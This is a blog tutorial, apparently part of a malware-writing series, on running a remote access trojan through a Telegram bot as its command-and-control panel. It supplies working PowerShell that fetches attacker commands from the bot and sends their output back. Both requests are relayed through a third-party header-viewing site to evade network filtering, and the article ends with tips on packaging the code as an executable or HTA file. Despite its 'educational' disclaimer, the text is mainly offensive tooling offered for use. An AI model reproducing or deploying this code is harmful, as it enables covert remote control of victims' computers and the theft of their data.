Disclaimer: This article is for educational and research purposes only. Do not use the information herein for illegal activities. The author is not responsible for any misuse.

Head of the seasons :

• What is meant by Telegram Panel?
• Getting Commands from Telegram Bot (Bypass Filtering)
• Sending Output to Telegram Bot (Bypass Filtering)
• Output
• Summary

1. What is meant by Telegram Panel?

You may have heard that Rat is connected to a Telegram bot
This means that Telegram acts like a proxy, meaning it is between the malware and the panel, and we use the Telegram bot for this technique.
For example, we send the ls command to the Telegram bot and the malware goes and makes a request, takes the last message we sent, executes it, and sends the output to the Telegram bot, and we see the result.
If you don't know how to create a Telegram bot, search on Google.

1. Getting Commands from Telegram Bot (Bypass Filtering)

To get the latest message from the Telegram bot, we use the following PowerShell code, which I will explain below.

 $url = "https://api.telegram.org/bot" + $token + "/getUpdates?chat_id=" + $chat_id 

 $param = @{ 
     UrlBox = $url 
     AgentList = "Google Chrome" 
     VersionsList = "HTTP/1.1" 
     MethodList = "GET" 
 } 
      
 try { 
     $response = Invoke-RestMethod -Uri "https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx" -Method Post -Body $param -TimeoutSec 5 
 } 
 catch {} 

 $regex = '"from":\{"id":' + $chat + '.*?"text":"([^"]+)"' 
      
 $ma4ch = [regex]::Matches($response, $regex) 
      
 if ($ma4ch.Count -gt 0) { 
     $global:command = $ma4ch[$ma4ch.Count - 1].Groups[1].Value 
 }  

• Contains the Telegram bot API, where we set the token and chat ID in the $url variable.
• To bypass filtering, the httpdebugger site contains headers that we need to set in the $param variable.
• catch , try are for error handling. The code inside the try block is executed first. If the program encounters a problem, the code inside the catch block is executed.
• Invoke-RestMethod to send a request to the Telegram API, the same as the Telegram bot.
• -Uri to set the address, here we set the address of the httpdebugger site to bypass filtering
• -Method to set the method for sending the request, which we set here as post.
• -Body to set headers
• -TimeoutSec 5 to set the amount of time to wait to connect to the server
• $regex In this variable is our pattern
• $ma4ch variable to find the result
  $global:command Getting the first result, which is our command

1. Sending Output to Telegram Bot (Bypass Filtering)

Using the following code, the malware can send the output to the Telegram bot.

 While ($true){ 
     $url = "https://api.telegram.org/bot" + $token + "/sendmessage?chat_id=" + $chat_id + "&text=" + $text  

     $param = @{ 
         UrlBox = $url 
         AgentList = "Google Chrome" 
         VersionsList = "HTTP/1.1" 
         MethodList = "GET" 
     }  

     try { 
         Invoke-RestMethod -Uri "https://www.httpdebugger.com/Tools/ViewHttpHeaders.aspx" -Method Post -Body $param -TimeoutSec 5 
         break 
     } 
     catch { 
         continue 
     } 
 } 

• The $text variable is our output that we send to the Telegram bot.
• break exits the loop
• continue Returns to the beginning of the loop

1. Output

You can combine this code with Python and run it as an executable file or you can use hta files, it depends on your creativity.

1. Summary

I hope you enjoyed this post.
Be sure to read our previous articles about creating malware and... and don't forget to support me. If the support is high, I will write more advanced and better articles.
If you have any questions, you can contact me on Telegram with this ID.

@malcorex